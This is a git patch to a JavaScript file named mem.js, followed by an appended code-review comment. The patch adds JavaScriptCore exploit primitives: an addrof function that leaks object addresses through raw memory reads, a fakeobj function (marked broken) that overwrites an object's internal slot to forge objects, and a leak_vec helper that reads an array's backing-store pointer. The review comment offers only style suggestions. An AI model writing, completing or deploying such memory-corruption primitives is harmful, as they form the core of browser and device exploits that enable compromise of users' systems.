From b040db45dfc9ef9a902e48bc2718a94cd099f505 Mon Sep 17 00:00:00 2001
From: spv420
Date: Tue, 31 May 2022 19:51:14 -0400
Subject: I live in a constant state of fear and misery Do you miss me anymore? And I don't even notice When it hurts anymore Anymore Anymore Anymore
---
 src/js/primitives/mem.js | 39 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
(limited to 'src/js/primitives/mem.js')
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index f6c4fe7..0cd2b7d 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -228,4 +228,43 @@ function _sptr(s) {
 */
 function sptr(s) {
 return _sptr(s + "\0");
+}
+
+var string_ref;
+var global_object;
+var jsobj_addr;
+
+var large_buf = new Uint32Array(0x100000);
+var large_buf_ptr = 0;
+
+function prep_shit() {
+ string_ref = scall("JSStringCreateWithUTF8CString", "victim");
+ global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+ jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+ large_buf_ptr = leak_vec(large_buf);
+}
+
+function addrof(obj) {
+ victim.target = obj;
+ return read_u32(jsobj_addr + 0x18);
+}
+
+// broken
+function fakeobj(addy) {
+ var string_ref = scall("JSStringCreateWithUTF8CString", sptr("victim"));
+ var global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+ var jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+ printf("YOLO\n");
+ printf("1 %x\n", read_u32(jsobj_addr + 0x18));
+ victim.target = 13.37;
+ printf("2 %x\n", read_u32(jsobj_addr + 0x18));
+ write_u32(jsobj_addr + 0x18, addy);
+ printf("3 %x\n", read_u32(jsobj_addr + 0x18));
+ return victim.target;
+}
+
+function leak_vec(arr) {
+ var addy = addrof(arr);
+ printf("%x\n", addy);
+ return read_u32(addy + VECTOR_OFFSET);
 }
\ No newline at end of file
-- 
cgit v1.2.3
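Review bot: The layout offsets `0x18` (in addrof and fakeobj) and `0x44` (in prep_shit and fakeobj) are repeated as bare literals even though the hunk already names the same kind of value in `VECTOR_OFFSET`; declaring them once beside the other module-level `var`s, e.g. `var JSOBJ_TARGET_OFFSET = 0x18;` and `var CTX_OFFSET = 0x44;`, would keep every layout assumption in one place. fakeobj also redeclares `string_ref`, `global_object` and `jsobj_addr` with `var`, shadowing the module-level variables that prep_shit fills, so the bare `// broken` marker leaves a reader unable to tell whether the shadowing is intended or part of the problem; the comment should name what was observed, e.g. `// broken: <observed failure here> — printf traces 1-3 left in for diagnosis`. prep_shit, addrof and fakeobj all depend on an object named `victim` that this hunk neither declares nor documents, so a one-line comment above prep_shit stating that `victim` must already exist on the global object before it runs would spare the next reader the search.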